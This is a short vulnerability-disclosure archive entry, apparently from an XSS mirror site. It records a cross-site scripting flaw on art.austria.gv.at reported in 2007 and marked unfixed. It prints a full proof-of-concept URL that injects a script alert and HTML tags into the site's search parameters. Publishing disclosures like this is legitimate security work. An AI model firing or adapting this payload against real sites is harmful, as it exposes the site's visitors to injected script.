Security researcher Uber0n, has submitted on 10/10/2007 a cross-site-scripting (XSS) vulnerability affecting art.austria.gv.at, which at the time of submission ranked 855416 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 10/10/2007 |
Date published: 13/10/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Uber0n |
Domain: art.austria.gv.at |
Category: XSS |
Pagerank: 855416 |
|---|
URL: http://art.austria.gv.at/emuseum/code/emuseum.asp?quicksearch=http%3A%2F%2Fart.austria.gv.at%2Femuse
um%2Fcode%2Femuseum.asp%3Fstyle%3Dbrowse%26currentrecord%3D1%26page%3Dsearch%26profile%3Dobjectsde%2
6searchdesc%3D%3Cscript%3Ealert%28123%29%3C%2Fscript%3E¤tstateobjects=¤tstatepeople=&sea
rchdescription=&searchxml=%3CeMuseum_search+date%3D%222007-10-10%22%3E%3Ccriteria%3E%3Cbasic+criteri
a%3D%22%5E%5E%5E%3E%27%3E%3Cu%3Exx%3C%2Fu%3E%5E%5E%5E%22+ft_type%3D%22%22%2F%3E%3Cparams+searchcode%
3D%22%22+pagesize%3D%228%22+currentpage%3D%221%22+orderfield%3D%22%22+orderdir%3D%22%22+profile%3D%2
2objectsde%22+userid%3D%22-1%22+module%3D%22Objects%22+moduleid%3D%221%22+lang%3D%22DE%22+aggregates
earch%3D%220%22+displayprofilename%3D%22Objekte%22+toplevelelementname%3D%22object%22+sessionid%3D%2
2%22+lastsort%3D%22alphasort%2CObjectID%22%2F%3E%3C%2Fcriteria%3E%3C%2FeMuseum_search%3E&term=%22%3E
%27%3E%3Cu%3Exx%3C%2Fu%3E%22&sessionid=&emu_action=quicksearch¤tusercollid=&profile=objectsde&
module=Objects&moduleid=1&lang=DE |
|
Click here to view the mirror
|
|
|
| 
